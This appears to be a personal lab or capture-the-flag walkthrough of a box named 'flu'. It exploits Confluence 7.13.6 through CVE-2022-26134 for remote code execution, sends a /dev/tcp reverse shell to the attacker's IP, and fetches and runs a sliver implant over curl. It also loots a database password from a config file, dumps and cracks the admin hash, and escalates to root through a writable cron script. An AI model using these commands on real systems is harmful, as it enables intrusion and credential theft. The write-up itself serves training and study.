## Enum
- 22 - ssh
- 8090 - http
    - potentially DAV?
    - confluence
- 8091 - http
    - JAMLINK?
- 8089
### 8091
This seems to just yield some kind of empty response??
Jamlink? Could be couchbase server?
![[Pasted image 20250425154226.png]]
### 8090 - Confluence
![[Pasted image 20250425153746.png]]
![[Pasted image 20250425154335.png]]
Not sure what the `ajs-base-url` denotes
```html
<meta name="ajs-base-url" content="http://192.168.226.170:8090">
<meta name="ajs-version-number" content="7.13.6">
```
I'm not sure what the fuck "ajs" is, but we could be rocking a version number for the application here?
A Confluence support forum thread corroborates the idea that this is the version number:
```
https://community.atlassian.com/forums/Confluence-questions/How-to-find-out-the-version-of-Atlassian-Confluence/qaq-p/735148
```
![[Pasted image 20250425160310.png]]
Appears that this version is from ~2021.
This gives me the basis for a CVE check:
![[Pasted image 20250425155637.png]]
This yields up multiple potential options.
There's one for confluence versions < `8.5.3` - RCE that could be promising depending on whether it requires authentication (had little success attempting default/common credentials for login).
```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41]
╰─> searchsploit -m 51904
Exploit: Atlassian Confluence < 8.5.3 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/51904
Path: /opt/exploitdb/exploits/multiple/webapps/51904.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /targets/flu/51904.py
```
https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
>A template injection vulnerability on out-of-date versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected version. Customers using an affected version must take immediate action.
This is unlikely to be it, seems to only affect `v8.x`.
Some details on [confluence server vs datacenter](https://confluence.atlassian.com/doc/confluence-server-and-data-center-feature-comparison-1333821673.html).
Another potential CVE: https://www.exploit-db.com/exploits/50243
```py
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros
```
So also unlikely....
Another option?
```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41]
╰─> searchsploit -m 50952
Exploit: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/50952
Path: /opt/exploitdb/exploits/java/webapps/50952.py
Codes: CVE-2022-26134
Verified: False
File Type: Python script, ASCII text executable, with very long lines (399)
Copied to: /targets/flu/50952.py
```
## Initial Access - CVE-2022-26134
[CVE-2022-26134](https://nvd.nist.gov/vuln/detail/cve-2022-26134)
> In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
"from 7.13.0 before 7.13.7" - let's go.
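As an added example for this writeup (not the exploit's or Atlassian's code), the check below pulls `ajs-version-number` out of the page HTML the way the meta tags on 8090 expose it and tests it against the affected branches quoted from NVD. `SAMPLE_HTML` is constructed to mirror those meta tags; the range table is copied from the advisory text, so a version that falls between listed branches is reported as "not matched" rather than "safe".

```python
"""Decide whether a self-reported Confluence version falls inside the
CVE-2022-26134 affected branches quoted from NVD above.

Added example for this writeup; not the exploit's or Atlassian's code.
SAMPLE_HTML is constructed to mirror the ajs-* meta tags seen on port 8090.
"""
import re
from html.parser import HTMLParser

# (first affected, first fixed) per branch, straight from the NVD text.
AFFECTED_RANGES = [
    ("1.3.0", "7.4.17"),
    ("7.13.0", "7.13.7"),
    ("7.14.0", "7.14.3"),
    ("7.15.0", "7.15.2"),
    ("7.16.0", "7.16.4"),
    ("7.17.0", "7.17.4"),
    ("7.18.0", "7.18.1"),
]

SAMPLE_HTML = """<html><head>
<meta name="ajs-base-url" content="http://192.168.226.170:8090">
<meta name="ajs-version-number" content="7.13.6">
</head><body></body></html>"""


class MetaCollector(HTMLParser):
    """Collect <meta name=... content=...> pairs from a page."""

    def __init__(self):
        super().__init__()
        self.meta = {}

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        if a.get("name") and a.get("content") is not None:
            self.meta[a["name"]] = a["content"]


def parse_version(text):
    """'7.13.6' -> (7, 13, 6). A non-numeric suffix ('7.13.6-rc1') is dropped
    so tuple comparison still works."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def confluence_version(html):
    """Return the ajs-version-number meta value, or None if absent."""
    collector = MetaCollector()
    collector.feed(html)
    return collector.meta.get("ajs-version-number")


def is_affected(version):
    """True when version sits in one of the quoted [first affected, first fixed)
    branches. Versions between branches (e.g. the end-of-life 7.5-7.12 line)
    are not covered by the quoted text, so False means 'not matched', not 'safe'."""
    v = parse_version(version)
    return any(parse_version(lo) <= v < parse_version(hi) for lo, hi in AFFECTED_RANGES)


if __name__ == "__main__":
    found = confluence_version(SAMPLE_HTML)
    print(found, "affected" if is_affected(found) else "not in quoted ranges")
```

Feeding the real page body into `confluence_version` instead of `SAMPLE_HTML` turns this into a quick inventory check across a fleet; the tuple comparison is what makes `7.13.6 < 7.13.7` and `7.13.6 > 7.4.17` come out right where a string compare would not.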
[Github source with usage examples](https://github.com/hev0x/CVE-2022-26134)
```
python3 exploit.py -u http://$RHOST:8090 -c whoami
```
Yields RCE <3333
We're about an hour in at this point.
Let's attempt to improve our foothold to a decent reverse shell:
```
python3 exploit.py -u http://$RHOST:8090 -c "/bin/bash -i >& /dev/tcp/192.168.45.231/8090 0>&1"
```
**Note:** I'm doubting whether a quoted command will work? If not I may have to tinker with the exploit or encode the payload somehow.
Well, quoting and spacing such as `-c "whoami --help"` seem to work out fine. The reverse shell, however, doesn't...
Let's see if we can leverage the RCE to download stuff, the system does have curl after all :-).
```
# start file server
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41]
╰─> python3 -m http.server 445
# execute
python3 exploit.py -u http://$RHOST:8090 -c "curl http://192.168.45.231:445/hello.txt -o /tmp/hello.txt"
# attempt to read the file to verify download integrity
python3 exploit.py -u http://$RHOST:8090 -c "cat /tmp/hello.txt"
```
File server logs the request as successful. And we can read the file too.
With that said, let's generate a sliver payload and serve that up:
```
sliver > generate --os linux --http 192.168.45.231 --skip-symbols --name flu
python3 exploit.py -u http://$RHOST:8090 -c "curl http://192.168.45.231:445/flu -o /tmp/flu"
python3 exploit.py -u http://$RHOST:8090 -c "chmod +x /tmp/flu"
python3 exploit.py -u http://$RHOST:8090 -c "/tmp/flu"
```
Aaaand we get a callback <3
```
sliver (flu) > cd /home/confluence
[*] /home/confluence
sliver (flu) > ls
/home/confluence (4 items, 8.0 KiB)
===================================
-rw------- Atlassian Confluence:confluence .bash_history 16 B Tue Dec 12 13:15:33 +0000 2023
drwxr-x--- Atlassian Confluence:confluence .cache <dir> Fri Aug 02 05:27:20 +0000 2024
drwxr-x--- Atlassian Confluence:confluence .java <dir> Fri Aug 02 05:26:47 +0000 2024
-rw-r--r-- Atlassian Confluence:confluence local.txt 33 B Fri Apr 25 13:28:39 +0000 2025
sliver (flu) > ifconfig
+-------------------------------------------+
| ens160 |
+-------------------------------------------+
| # | IP Addresses | MAC Address |
+---+-------------------+-------------------+
| 3 | 192.168.188.41/24 | 00:50:56:9e:e5:c9 |
+-------------------------------------------+
1 adapters not shown.
sliver (flu) > cat local.txt
b6c6bd9cc70b3f397cc72d80e7508036
```
We get the first flag in about an hour or so.
## Privesc
Some initial thoughts:
- can we loot the confluence database and leverage those credentials for privesc?
    - this is time consuming and will be parked for now
    - it's very unlikely that a company such as Atlassian stores user credentials insecurely
- `/etc/sshd_config` sets `PermitRootLogin Yes`
    - this could indicate that looting root credentials from, say, the confluence DB may be viable
- bash history contains nothing
- hunting for [[SUID Binaries]] reveals
    - `/usr/lib/openssh/ssh-keysign`, which is owned by root?
    - it's not listed on gtfobins and thus I'll pin this for now too...
- user enumeration
    - `confluence`
    - `mysql`
    - `root`
- `sudo -l`
    - nada
- [[SUID Binaries]]
    - no results
- looking into cron stuff
### Process Enumeration
- process enumeration
    - `ps aux` nothing pops
```
/tmp/pspy
2025/04/26 09:38:45 CMD: UID=1001 PID=1468 | /opt/atlassian/confluence/jre/bin/java -classpath /opt/atlassian/confluence/temp/4.0.0-master-3b3337da.jar:/opt/atlassian/confluence/confluence/WEB-INF/lib/mysql-connector-java-8.2.0.jar -Xss2048k -Xmx2g synchrony.core sql
2025/04/26 09:38:45 CMD: UID=1001 PID=1150 | /opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2025-03-01_09-43-59.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-2025-03-01_09-43-59.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start
```
### Internal Ports
```
╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::8090 :::* LISTEN 1150/java
tcp6 0 0 :::8091 :::* LISTEN 1468/java
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8000 :::* LISTEN 1150/java
```
### `confluence.cfg.xml`
```
confluence@flu:/tmp$ find / -type f -name "confluence.cfg.xml" 2>/dev/null
/var/atlassian/application-data/confluence/shared-home/confluence.cfg.xml
/var/atlassian/application-data/confluence/confluence.cfg.xml
```
Should contain [[MYSQL]] database passwords: https://support.atlassian.com/confluence/kb/where-does-confluence-store-the-database-password/
```
cat /var/atlassian/application-data/confluence/confluence.cfg.xml | grep "pass"
<property name="hibernate.connection.password">HoldingOn12</property>
cat /var/atlassian/application-data/confluence/shared-home/confluence.cfg.xml
bash: /var/atlassian/application-data/confluence/confluence.cfg.xml: Permission denied
```
The password doesn't work for `root`, so likely we're gonna have to connect to the [[MYSQL]] database...
```
<property name="hibernate.connection.password">HoldingOn12</property>
<property name="hibernate.connection.url">jdbc:mysql://localhost:3306/confluence</property>
<property name="hibernate.connection.username">confluence</property>
```
```
# on the target: --password takes its value with '=' (a space-separated value would be read as the database name)
mysql -u confluence -h localhost --password=HoldingOn12 confluence
# alternatively, forward 3306 through the sliver session and use mycli from the attacking host
portfwd add --bind 0.0.0.0:3306 --remote 0.0.0.0:3306
mycli -u confluence -h localhost --password HoldingOn12 confluence
```
We can get admin credential:
```
MySQL confluence@localhost:confluence> select user_name, credential from cwd_user;
+-----------+---------------------------------------------------------------------------+
| user_name | credential |
+-----------+---------------------------------------------------------------------------+
| admin | {PKCS5S2}MCB0MaBA39GjOQb3wG0ioM7w+pPdQXdy5GskVAtS5/Ef0fCnvr8jPMdZ2CDhM0ke |
+-----------+---------------------------------------------------------------------------+
```
https://developer.atlassian.com/server/confluence/password-hash-algorithm/
> Confluence uses the salted PKCS5S2 implementation provided by Embedded Crowd.
Seems like this is gonna be a bitch to crack...
```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41]
╰─> john --wordlist=/arsenal/wordlists/rockyou.txt admin.hash
```
Loading....
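An added example (not Atlassian's, Crowd's or john's code) that parses and verifies the `{PKCS5S2}` format, which per the Atlassian developer page linked above is PBKDF2-HMAC-SHA1 with a 16-byte salt, 10,000 iterations and a 32-byte derived key, stored as `{PKCS5S2}` + base64(salt || key). The `SAMPLE_*` values are constructed with a fixed salt so the output is reproducible; the `admin` hash from `cwd_user` is only parsed for its layout.

```python
"""Parse and verify Atlassian {PKCS5S2} password hashes.

Added example, not Atlassian's, Crowd's or john's code. The format (per the
Atlassian developer page linked above) is PBKDF2-HMAC-SHA1, 16-byte random
salt, 10,000 iterations, 32-byte derived key, stored as
'{PKCS5S2}' + base64(salt || key). SAMPLE_* values are constructed; ADMIN_HASH
is the value pulled from cwd_user above and is only parsed, never guessed at.
"""
import base64
import hashlib
import hmac
import os

PREFIX = "{PKCS5S2}"
SALT_LEN = 16
KEY_LEN = 32
ITERATIONS = 10_000


def parse_pkcs5s2(encoded):
    """Split an encoded hash into (salt, derived_key); raises on bad input."""
    if not encoded.startswith(PREFIX):
        raise ValueError("missing {PKCS5S2} prefix")
    raw = base64.b64decode(encoded[len(PREFIX):], validate=True)
    if len(raw) != SALT_LEN + KEY_LEN:
        raise ValueError(f"expected {SALT_LEN + KEY_LEN} bytes, got {len(raw)}")
    return raw[:SALT_LEN], raw[SALT_LEN:]


def encode_pkcs5s2(password, salt=None):
    """Produce a hash the way Crowd stores it; salt defaults to 16 random bytes."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, ITERATIONS, KEY_LEN)
    return PREFIX + base64.b64encode(salt + key).decode("ascii")


def verify_pkcs5s2(password, encoded):
    """Constant-time check of one candidate password against one stored hash."""
    salt, key = parse_pkcs5s2(encoded)
    candidate = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, ITERATIONS, KEY_LEN)
    return hmac.compare_digest(candidate, key)


# Constructed sample with a fixed salt so the output is reproducible.
SAMPLE_PASSWORD = "correct horse battery"
SAMPLE_SALT = bytes(range(SALT_LEN))
SAMPLE_HASH = encode_pkcs5s2(SAMPLE_PASSWORD, SAMPLE_SALT)

# The admin row from cwd_user on this box, parsed for its layout only.
ADMIN_HASH = "{PKCS5S2}MCB0MaBA39GjOQb3wG0ioM7w+pPdQXdy5GskVAtS5/Ef0fCnvr8jPMdZ2CDhM0ke"

if __name__ == "__main__":
    salt, key = parse_pkcs5s2(ADMIN_HASH)
    print(f"admin hash: {len(salt)}-byte salt, {len(key)}-byte key, {ITERATIONS} PBKDF2 rounds")
    print("sample verifies:", verify_pkcs5s2(SAMPLE_PASSWORD, SAMPLE_HASH))
```

The 10,000 PBKDF2 rounds per candidate are exactly why a rockyou run against a single hash takes as long as it does, and why a per-user random salt means the cost cannot be shared across rows; that is the property a defender wants from a credential store, and the reason the "Loading...." above is not a bug.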
### `/home/confluence/snap`
```
confluence@flu:/home/confluence/snap/lxd$ cat ./common/config/config.yml
default-remote: local
remotes:
images:
addr: https://images.linuxcontainers.org
protocol: simplestreams
public: true
local:
addr: unix://
public: false
aliases: {}
```
Could indicate that we're inside an LXD container?....
### `/opt`
Contains `/opt/log-backup.sh`
```
confluence@flu:/opt$ ls -l
total 756684
drwxr-xr-x 3 root root 4096 Dec 12 2023 atlassian
-rwxr-xr-x 1 root root 774829955 Dec 12 2023 atlassian-confluence-7.13.6-x64.bin
-rwxr-xr-x 1 confluence confluence 408 Dec 12 2023 log-backup.sh
```
It's owned by us but interacts with `/root`?
```
confluence@flu:/opt$ ./log-backup.sh
cp: cannot stat '/root/backup/log_backup_20250426110531': Permission denied
tar: Removing leading `/' from member names
tar: /root/backup/log_backup_20250426110531: Cannot stat: Permission denied
tar (child): /root/backup/log_backup_20250426110531.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
find: ‘/root/backup’: Permission denied
```
This means it's possibly being executed in a root context somewhere.
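An added example (not linpeas's or the lab's code) of the check that would have surfaced `/opt/log-backup.sh` sooner: walk `/etc/crontab`-style entries, take the command's first token when it is an absolute path, and flag root-run scripts that a non-root user owns or that group/other can write. `SAMPLE_CRONTAB`, `FAKE_STATS` and `fake_stat` are constructed to mirror this box (uid 1001 is the confluence user per the pspy output above; `start-agent.sh` is invented); on a live host pass `os.stat` instead of `fake_stat`.

```python
"""Flag scheduled scripts that run as root but that a non-root user can change.

Added example, not linpeas's or the lab's code. Reads /etc/crontab-style lines
(the ones with a user field), takes the command's first token when it is an
absolute path, and reports root-run scripts that are owned by someone other
than root or are group/other writable. SAMPLE_CRONTAB and fake_stat are
constructed to mirror this box; on a live host pass os.stat instead.
"""
import os
import shlex
import stat
from types import SimpleNamespace

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
*/5 *   * * *   root    /opt/log-backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    /usr/local/bin/start-agent.sh --quiet
"""

# (uid, st_mode): log-backup.sh as ls -l showed it (confluence-owned, uid 1001
# per pspy); start-agent.sh is an invented root-owned control case.
FAKE_STATS = {
    "/opt/log-backup.sh": (1001, 0o100755),
    "/usr/local/bin/start-agent.sh": (0, 0o100755),
}


def fake_stat(path):
    """Stand-in for os.stat over the constructed view above."""
    if path not in FAKE_STATS:
        raise FileNotFoundError(path)
    uid, mode = FAKE_STATS[path]
    return SimpleNamespace(st_uid=uid, st_mode=mode)


def cron_entries(text):
    """Return (user, command) pairs from system-crontab lines; skips comments,
    blank lines and VAR=value assignments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):              # @reboot / @daily form: 3 fields
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            entries.append((fields[1], fields[2]))
        else:                                  # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            entries.append((fields[5], fields[6]))
    return entries


def command_path(command):
    """The command's first token if it is an absolute path, else None
    (shell built-ins such as `cd` and PATH lookups are out of scope)."""
    tokens = shlex.split(command)
    if tokens and tokens[0].startswith("/"):
        return tokens[0]
    return None


def check_stat(path, uid, mode, run_as="root"):
    """Findings for one file given its owner uid and permission bits."""
    findings = []
    if run_as == "root" and uid != 0:
        findings.append(f"{path}: runs as root but is owned by uid {uid}")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: mode {oct(mode)} is group/other writable")
    return findings


def audit_crontab(text, stat_fn=os.stat):
    """Run check_stat over every absolute-path command in the crontab text."""
    findings = []
    for user, command in cron_entries(text):
        path = command_path(command)
        if path is None:
            continue
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            findings.append(f"{path}: referenced by cron but missing")
            continue
        findings += check_stat(path, st.st_uid, stat.S_IMODE(st.st_mode), user)
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB, fake_stat):
        print(finding)
```

The owner check is the one that matters here: `-rwxr-xr-x confluence confluence` is not world-writable, so a permissions-only grep would never have flagged it, but a root cron job running a file the web user owns is the whole privesc. The same check applies to per-user crontabs under `/var/spool/cron` and to `/etc/cron.d`, which use the same formats.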
I'm low on time, so just gonna throw a reverse shell execution into it and wait like 5 minutes..
Aaaaand we get a callback as `root`:
```
root@flu:~# cd /root
root@flu:~# ls
backup email8.txt proof.txt snap
root@flu:~# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.188.41 netmask 255.255.255.0 broadcast 192.168.188.255
ether 00:50:56:9e:8d:11 txqueuelen 1000 (Ethernet)
RX packets 53071 bytes 31671269 (31.6 MB)
RX errors 0 dropped 437 overruns 0 frame 0
TX packets 46167 bytes 10238334 (10.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 693939 bytes 98769036 (98.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 693939 bytes 98769036 (98.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@flu:~# cat proof.txt
c363554af5920897c09019c5e4d2821c
```
## Lessons Learned
- [[MYSQL]] tooling
- Do not trust linpeas colours; it actually output `/opt/log-backup.sh`
    - This should have gotten my attention much sooner